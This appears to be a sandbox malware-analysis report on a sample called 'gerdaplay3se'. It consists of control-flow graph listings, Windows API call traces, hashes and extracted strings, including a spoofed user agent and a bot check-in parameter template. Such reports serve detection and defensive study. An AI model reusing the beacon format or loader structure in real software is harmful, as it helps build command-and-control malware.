2d67391-2d67397 278->282 283 2d673ab-2d673b9 278->283 292 2d67382-2d67383 InternetCloseHandle 279->292 293 2d67342 279->293 284 2d6739d-2d673aa call 2d653ec 282->284 285 2d67399-2d6739b 282->285 283->264 287 2d673bf-2d673e3 call 2d74a30 call 2d6439c 283->287 284->283 285->283 287->264 302 2d673e9-2d67417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d7227c 287->302 292->278 297 2d67346-2d6736c InternetReadFile 293->297 299 2d67377-2d6737e InternetCloseHandle 297->299 300 2d6736e-2d67375 297->300 299->292 300->297 305 2d6746d-2d67488 call 2d7227c 302->305 306 2d67419-2d6742b call 2d7227c 302->306 312 2d67742-2d67754 call 2d7227c 305->312 313 2d6748e-2d67490 305->313 306->305 311 2d6742d-2d6743f call 2d7227c 306->311 311->305 320 2d67441-2d67453 call 2d7227c 311->320 321 2d67756-2d67758 312->321 322 2d6779d-2d677af call 2d7227c 312->322 313->312 316 2d67496-2d67548 call 2d72eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2d74a30 * 5 call 2d6439c * 2 313->316 379 2d67585 316->379 380 2d6754a-2d6754c 316->380 320->305 334 2d67455-2d67467 call 2d7227c 320->334 321->322 324 2d6775a-2d67798 call 2d74a30 RtlEnterCriticalSection RtlLeaveCriticalSection 321->324 335 2d677d0-2d677e2 call 2d7227c 322->335 336 2d677b1-2d677cb call 2d661f5 call 2d66303 call 2d6640e 322->336 324->264 334->264 334->305 345 2d67b00-2d67b12 call 2d7227c 335->345 346 2d677e8-2d677ea 335->346 336->264 345->264 360 2d67b18-2d67b46 call 2d72eec call 2d74a30 call 2d6439c 345->360 346->345 349 2d677f0-2d67807 call 2d6439c 346->349 349->264 361 2d6780d-2d678db call 2d72358 call 2d61ba7 349->361 381 2d67b4f-2d67b56 call 2d72eb4 360->381 382 2d67b48-2d67b4a call 2d6534d 360->382 377 2d678e2-2d67903 RtlEnterCriticalSection 361->377 378 2d678dd call 2d6143f 361->378 385 2d67905-2d6790c 377->385 386 2d6790f-2d67973 RtlLeaveCriticalSection call 2d63c67 call 2d63d7e call 2d68272 377->386 378->377 383 2d67589-2d675b7 call 2d72eec call 2d74a30 call 2d6439c 379->383 380->379 387 2d6754e-2d67560 call 2d7227c 380->387 381->264 382->381 410 2d675f8-2d67601 call 2d72eb4 383->410 411 2d675b9-2d675c8 call 2d73529 383->411 385->386 408 2d67ae7-2d67afb call 2d68f3a 386->408 409 2d67979-2d679c1 call 2d6a65c 386->409 387->379 398 2d67562-2d67583 call 2d6439c 387->398 398->383 408->264 421 2d679c7-2d679ce 409->421 422 2d67ab1-2d67ae2 call 2d68321 call 2d633b2 409->422 423 2d67607-2d6761f call 2d73a8f 410->423 424 2d67738-2d6773b 410->424 411->410 420 2d675ca 411->420 425 2d675cf-2d675e1 call 2d72790 420->425 427 2d679d1-2d679d6 421->427 422->408 436 2d67621-2d67629 call 2d6966e 423->436 437 2d6762b 423->437 424->312 439 2d675e6-2d675f6 call 2d73529 425->439 440 2d675e3 425->440 427->427 431 2d679d8-2d67a23 call 2d6a65c 427->431 431->422 446 2d67a29-2d67a2f 431->446 438 2d6762d-2d676e5 call 2d6a786 call 2d63863 call 2d65119 call 2d63863 call 2d6aa2c call 2d6ab46 436->438 437->438 466 2d676e7 call 2d6380b 438->466 467 2d676ec-2d67717 Sleep call 2d71830 438->467 439->410 439->425 440->439 449 2d67a32-2d67a37 446->449 449->449 451 2d67a39-2d67a74 call 2d6a65c 449->451 451->422 456 2d67a76-2d67ab0 call 2d6d04e 451->456 456->422 466->467 471 2d67723-2d67731 467->471 472 2d67719-2d67722 call 2d64100 467->472 471->424 474 2d67733 call 2d6380b 471->474 472->471 474->424
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                  • API String ID: 0-2678694477
                                                                                  • Opcode ID: 5928accc84f785bf01999c4586186666cee50f8d93527682fbef95c978ee1ea5
                                                                                  • Instruction ID: 4e16cfb8d9a0f4c0e48417adf02e780fd463a70bd46d94753ed8be28c306d645
                                                                                  • Opcode Fuzzy Hash: 5928accc84f785bf01999c4586186666cee50f8d93527682fbef95c978ee1ea5
                                                                                  • Instruction Fuzzy Hash: B081A6B1D583509BE310AB75AC48B6BBBE9EF85710F20082EF944D7350EA789C00CFA5

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D61D11
                                                                                  • GetLastError.KERNEL32 ref: 02D61D23
                                                                                    • Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D61D59
                                                                                  • GetLastError.KERNEL32 ref: 02D61D6B
                                                                                  • __beginthreadex.LIBCMT ref: 02D61DB1
                                                                                  • GetLastError.KERNEL32 ref: 02D61DC6
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D61DDD
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 02D61DEC
                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D61E14
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 02D61E1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                  • String ID: thread$thread.entry_event$thread.exit_event
                                                                                  • API String ID: 831262434-3017686385
                                                                                  • Opcode ID: 7d611788d36251dfa93263865c4f5b02e36132563dd0611262601487670f18c9
                                                                                  • Instruction ID: eedf73a8b9abc2714b2dfe35daa94961f3d15ea801ddeb3b131ad08b923c56c6
                                                                                  • Opcode Fuzzy Hash: 7d611788d36251dfa93263865c4f5b02e36132563dd0611262601487670f18c9
                                                                                  • Instruction Fuzzy Hash: C6317C759143019FE700EF20C889B2BBBA5FB84755F204969F9599B390EB70DC49CFA2

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D64D8B
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D64DB7
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D64DC3
                                                                                    • Part of subcall function 02D64BED: __EH_prolog.LIBCMT ref: 02D64BF2
                                                                                    • Part of subcall function 02D64BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D64CF2
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D64E93
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D64E99
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D64EA0
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D64EA6
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D650A7
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D650AD
                                                                                  • RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D650B8
                                                                                  • RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D650C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                  • String ID:
                                                                                  • API String ID: 2062355503-0
                                                                                  • Opcode ID: f9b8831027b497c6ad25647dc73b3aad803e6e7fd3ccd014bac8b4a78c4ca834
                                                                                  • Instruction ID: a2d3af3dce273bee807d6faf79f8ef58e320c1721971d2740ad980f7908cf80a
                                                                                  • Opcode Fuzzy Hash: f9b8831027b497c6ad25647dc73b3aad803e6e7fd3ccd014bac8b4a78c4ca834
                                                                                  • Instruction Fuzzy Hash: 94B13671D002599FEF21DFA0D848BEEBBB5AF04314F20409AE445BA381DB755E89CFA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 862 401f64-401f84 FindResourceA 863 401f86-401f9d GetLastError SizeofResource 862->863 864 401f9f-401fa1 862->864 863->864 865 401fa6-401fec LoadResource LockResource GlobalAlloc call 402800 * 2 863->865 866 402096-40209a 864->866 871 401fee-401ff9 865->871 871->871 872 401ffb-402003 GetTickCount 871->872 873 402032-402038 872->873 874 402005-402007 872->874 875 402053-402083 GlobalAlloc call 401c26 873->875 877 40203a-40204a 873->877 874->875 876 402009-40200f 874->876 882 402088-402093 875->882 876->875 878 402011-402023 876->878 879 40204c 877->879 880 40204e-402051 877->880 883 402025 878->883 884 402027-40202a 878->884 879->880 880->875 880->877 882->866 883->884 884->878 885 40202c-40202e 884->885 885->876 886 402030 885->886 886->875
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                  • GetLastError.KERNEL32 ref: 00401F86
                                                                                  • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                  • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                  • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                  • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                  • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                  • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                  • String ID:
                                                                                  • API String ID: 564119183-0
                                                                                  • Opcode ID: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                                  • Instruction ID: 3f373f2fe47a9e58058ec223940fe379f908771e1a31376a549d0366c6000c22
                                                                                  • Opcode Fuzzy Hash: c339dbb3d4f54c4bfe23240511e1faf338c1a50a53de60f6f0a2310917010a4d
                                                                                  • Instruction Fuzzy Hash: D0314C32A402516FDB109FB99E889AF7FB8EF45344B10807AFA46F7291D6748841C7A8

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02D62706
                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D6272B
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D85A93), ref: 02D62738
                                                                                    • Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717
                                                                                  • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D62778
                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02D627D9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                  • String ID: timer
                                                                                  • API String ID: 4293676635-1792073242
                                                                                  • Opcode ID: 610973c259d97d2d3507e39a2b267aa480c85b16f62b89e108a7860d5978a358
                                                                                  • Instruction ID: 4c89d3e433296dd7ffce74989a95e2234ccacaa2ab451116068626cb058b7bd8
                                                                                  • Opcode Fuzzy Hash: 610973c259d97d2d3507e39a2b267aa480c85b16f62b89e108a7860d5978a358
                                                                                  • Instruction Fuzzy Hash: 97316FB1914705AFD310DF65D988B66BBE8FB48725F104A2EF85586780E770EC14CFA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 938 2d62b95-2d62baf 939 2d62bc7-2d62bcb 938->939 940 2d62bb1-2d62bb9 call 2d70a50 938->940 942 2d62bdf 939->942 943 2d62bcd-2d62bd0 939->943 947 2d62bbf-2d62bc2 940->947 946 2d62be2-2d62c11 WSASetLastError WSARecv call 2d6a440 942->946 943->942 945 2d62bd2-2d62bdd call 2d70a50 943->945 945->947 952 2d62c16-2d62c1d 946->952 950 2d62d30 947->950 955 2d62d32-2d62d38 950->955 953 2d62c1f-2d62c2a call 2d70a50 952->953 954 2d62c2c-2d62c32 952->954 963 2d62c3f-2d62c42 953->963 957 2d62c46-2d62c48 954->957 958 2d62c34-2d62c39 call 2d70a50 954->958 961 2d62c4f-2d62c60 call 2d70a50 957->961 962 2d62c4a-2d62c4d 957->962 958->963 961->955 965 2d62c66-2d62c69 961->965 962->965 963->957 968 2d62c73-2d62c76 965->968 969 2d62c6b-2d62c6d 965->969 968->950 970 2d62c7c-2d62c9a call 2d70a50 call 2d6166f 968->970 969->968 971 2d62d22-2d62d2d call 2d61996 969->971 978 2d62cbc-2d62cfa WSASetLastError select call 2d6a440 970->978 979 2d62c9c-2d62cba call 2d70a50 call 2d6166f 970->979 971->950 985 2d62cfc-2d62d06 call 2d70a50 978->985 986 2d62d08 978->986 979->950 979->978 992 2d62d19-2d62d1d 985->992 987 2d62d15-2d62d17 986->987 988 2d62d0a-2d62d12 call 2d70a50 986->988 987->950 987->992 988->987 992->946
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D62BE4
                                                                                  • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D62C07
                                                                                    • Part of subcall function 02D6A440: WSAGetLastError.WS2_32(00000000,?,?,02D62A51), ref: 02D6A44E
                                                                                  • WSASetLastError.WS2_32 ref: 02D62CD3
                                                                                  • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D62CE7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Recvselect
                                                                                  • String ID: 3'
                                                                                  • API String ID: 886190287-280543908
                                                                                  • Opcode ID: 9e597475e1ab1277160443703efac1af1179eb29e2f7f73aef86aa8528eddd7d
                                                                                  • Instruction ID: 0d8871a33bf93fe994f535daf6b151fb553c0e215684fba979940e46d76702a0
                                                                                  • Opcode Fuzzy Hash: 9e597475e1ab1277160443703efac1af1179eb29e2f7f73aef86aa8528eddd7d
                                                                                  • Instruction Fuzzy Hash: 624108B19183019FD7109F64C94D76ABBEAEF84365F10492EE899C7380EB74D940CBA2

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32 ref: 0040B305
                                                                                  • GetCommandLineW.KERNEL32(?), ref: 0040B324
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 0040B655
                                                                                  • GetLocalTime.KERNEL32(00409F90), ref: 0040B878
                                                                                  Strings
                                                                                  • Eclipse IO Library 9.27.43, xrefs: 0040B30B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandLine$ArgvFileLocalModuleNameTime
                                                                                  • String ID: Eclipse IO Library 9.27.43
                                                                                  • API String ID: 1042648101-2124222407
                                                                                  • Opcode ID: 4ea5313fc702dad747c75675afa4d068a86737ebefe062ed9685430f81578187
                                                                                  • Instruction ID: dc972e520a3a1c25a8e085b75d184a989db7c982d5ef784bdd5d1ca802e4f2f6
                                                                                  • Opcode Fuzzy Hash: 4ea5313fc702dad747c75675afa4d068a86737ebefe062ed9685430f81578187
                                                                                  • Instruction Fuzzy Hash: 1701D131848282EFC70097A18C5D5687BE4EE0635132584BFE193AB0E3CB3C4492DB5E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1054 2d629ee-2d62a06 1055 2d62ab3-2d62abb call 2d70a50 1054->1055 1056 2d62a0c-2d62a10 1054->1056 1065 2d62abe-2d62ac6 1055->1065 1057 2d62a12-2d62a15 1056->1057 1058 2d62a39-2d62a4c WSASetLastError closesocket call 2d6a440 1056->1058 1057->1058 1060 2d62a17-2d62a36 call 2d70a50 call 2d62f50 1057->1060 1064 2d62a51-2d62a55 1058->1064 1060->1058 1064->1055 1067 2d62a57-2d62a5f call 2d70a50 1064->1067 1072 2d62a61-2d62a67 1067->1072 1073 2d62a69-2d62a71 call 2d70a50 1067->1073 1072->1073 1074 2d62a7b-2d62aad ioctlsocket WSASetLastError closesocket call 2d6a440 1072->1074 1078 2d62a73-2d62a79 1073->1078 1079 2d62aaf-2d62ab1 1073->1079 1074->1079 1078->1074 1078->1079 1079->1055 1079->1065
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D62A3B
                                                                                  • closesocket.WS2_32 ref: 02D62A42
                                                                                  • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D62A89
                                                                                  • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D62A97
                                                                                  • closesocket.WS2_32 ref: 02D62A9E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 1561005644-0
                                                                                  • Opcode ID: 4ec3ba94cd207d2fd19936419df4fedfa5e7aecd29ee2a04c08c9166038df10e
                                                                                  • Instruction ID: c5cb5da9abe64fd54e6e0ee6289ba1ac49ad3ba3be6027ce1230aeec4ed07bff
                                                                                  • Opcode Fuzzy Hash: 4ec3ba94cd207d2fd19936419df4fedfa5e7aecd29ee2a04c08c9166038df10e
                                                                                  • Instruction Fuzzy Hash: D321F475A14205ABEB209BB88D4CB7AB7E9EF44316F108969EC55D3380FBB4CD40CB61

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1081 2d61ba7-2d61bcf call 2d85330 RtlEnterCriticalSection 1084 2d61bd1 1081->1084 1085 2d61be9-2d61bf7 RtlLeaveCriticalSection call 2d6e267 1081->1085 1086 2d61bd4-2d61be0 call 2d61b79 1084->1086 1088 2d61bfa-2d61c20 RtlEnterCriticalSection 1085->1088 1093 2d61c55-2d61c6e RtlLeaveCriticalSection 1086->1093 1094 2d61be2-2d61be7 1086->1094 1090 2d61c34-2d61c36 1088->1090 1091 2d61c22-2d61c2f call 2d61b79 1090->1091 1092 2d61c38-2d61c43 1090->1092 1095 2d61c45-2d61c4b 1091->1095 1099 2d61c31 1091->1099 1092->1095 1094->1085 1094->1086 1095->1093 1097 2d61c4d-2d61c51 1095->1097 1097->1093 1099->1090
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D61BAC
                                                                                  • RtlEnterCriticalSection.NTDLL ref: 02D61BBC
                                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02D61BEA
                                                                                  • RtlEnterCriticalSection.NTDLL ref: 02D61C13
                                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02D61C56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 1633115879-0
                                                                                  • Opcode ID: 29e43ac7d6f20b6169c4d0a05fafeca6879225255c122aefed6cfd92e3618d1c
                                                                                  • Instruction ID: f0fc7c741453bf5e14da7d520794a0964e757351567761f44b48fe8fe539527c
                                                                                  • Opcode Fuzzy Hash: 29e43ac7d6f20b6169c4d0a05fafeca6879225255c122aefed6cfd92e3618d1c
                                                                                  • Instruction Fuzzy Hash: CB21AB79A002059FDB14CF68C8487AAFBB5FF48710F218589E8599B301D770ED11CBA0
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 02D73AA7
                                                                                    • Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
                                                                                    • Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
                                                                                    • Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F
                                                                                  • std::exception::exception.LIBCMT ref: 02D73AC5
                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D73ADA
                                                                                    • Part of subcall function 02D7449A: RaiseException.KERNEL32(?,?,02D6FA96,?,?,?,?,?,?,?,02D6FA96,?,02D90F78,?), ref: 02D744EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                  • String ID: bad allocation
                                                                                  • API String ID: 3074076210-2104205924
                                                                                  • Opcode ID: 2216a5614f64f2f79ec9059022a58043d917b089c707e2318b2c5ead1bad05b2
                                                                                  • Instruction ID: d17a48ee12f4f1d00e9078fd131e12249a18037a0479c8a42e0a936d77efe90a
                                                                                  • Opcode Fuzzy Hash: 2216a5614f64f2f79ec9059022a58043d917b089c707e2318b2c5ead1bad05b2
                                                                                  • Instruction Fuzzy Hash: D6E0307190420EAADF00FEA4DC099AFB769EB00355F5005A5AC14A5790FB75DE44E9A1
                                                                                  APIs
                                                                                  • GetVersion.KERNEL32 ref: 00402D86
                                                                                    • Part of subcall function 004039F0: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                                    • Part of subcall function 004039F0: HeapDestroy.KERNEL32 ref: 00403A40
                                                                                  • GetCommandLineA.KERNEL32 ref: 00402DD4
                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00402DFF
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402E22
                                                                                    • Part of subcall function 00402E7B: ExitProcess.KERNEL32 ref: 00402E98
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2057626494-0
                                                                                  • Opcode ID: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                                  • Instruction ID: f31f1ce04d2051e6b9e8acf883bbbbaa5bd69f55a1c9941ff1c46623f1a3e60c
                                                                                  • Opcode Fuzzy Hash: 9e286e5f9a377e3797ece88135c359dedbbb575cc14907a13f37508a60b21901
                                                                                  • Instruction Fuzzy Hash: AD219FB0840715AADB04EFA6DE09A6E7BB8EB04704F10413FF502B72E2DB388510CB59
                                                                                  APIs
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D62EEE
                                                                                  • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D62EFD
                                                                                  • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D62F0C
                                                                                  • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D62F36
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Socketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 2093263913-0
                                                                                  • Opcode ID: 9136e7854c4f91841eb994d0e9ab7e7b6626a79d47ebe15c2efc67dea998beb9
                                                                                  • Instruction ID: 4375a046a129061e78bf1e6a9a0935b85f1be1a0374c076ef8f73a57b1f5847a
                                                                                  • Opcode Fuzzy Hash: 9136e7854c4f91841eb994d0e9ab7e7b6626a79d47ebe15c2efc67dea998beb9
                                                                                  • Instruction Fuzzy Hash: 5A017575950204BBDB205F66DC49F5ABBADEB89771F00C565F918CB281D7748D00CBB1
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D9A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D9A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d9a000_gerdaplay3se.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandleWrite
                                                                                  • String ID: O~|
                                                                                  • API String ID: 1769507746-3096879844
                                                                                  • Opcode ID: 2ae2de1f70dc79a7f14f504f3ee3f3d40cf5553912e2032620e59572ed277b62
                                                                                  • Instruction ID: ddf6ebfc2a7a1950730e0bd954c758a589c5023f1f5585c1ef85151d1ea8a312
                                                                                  • Opcode Fuzzy Hash: 2ae2de1f70dc79a7f14f504f3ee3f3d40cf5553912e2032620e59572ed277b62
                                                                                  • Instruction Fuzzy Hash: 64514CF290C604AFE715AE19EC85BBAFBE5EF84720F16482DE7C483700E6355840CA97
                                                                                  APIs
                                                                                    • Part of subcall function 02D62D39: WSASetLastError.WS2_32(00000000), ref: 02D62D47
                                                                                    • Part of subcall function 02D62D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D62D5C
                                                                                  • WSASetLastError.WS2_32(00000000), ref: 02D62E6D
                                                                                  • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D62E83
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$Sendselect
                                                                                  • String ID: 3'
                                                                                  • API String ID: 2958345159-280543908
                                                                                  • Opcode ID: 58ae76e7e0a3056e6f431f37fe7739482019d634a0be5942c75b9ec2fd2db327
                                                                                  • Instruction ID: 2dc7dfeeae7d8ec03bb4c52ed091c0051965c13643c3b21c62ebc6ed665a13ae
                                                                                  • Opcode Fuzzy Hash: 58ae76e7e0a3056e6f431f37fe7739482019d634a0be5942c75b9ec2fd2db327
                                                                                  • Instruction Fuzzy Hash: 53317CB1A002059BDB109FA4C84DBFEBBAAEF44324F00456ADC4997380E7759D54CFE0
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 02D6CCE0
                                                                                    • Part of subcall function 02D6D29E: std::exception::exception.LIBCMT ref: 02D6D2CB
                                                                                    • Part of subcall function 02D6DAB4: __EH_prolog.LIBCMT ref: 02D6DAB9
                                                                                    • Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7
                                                                                    • Part of subcall function 02D6D2FB: __EH_prolog.LIBCMT ref: 02D6D300
                                                                                  Strings
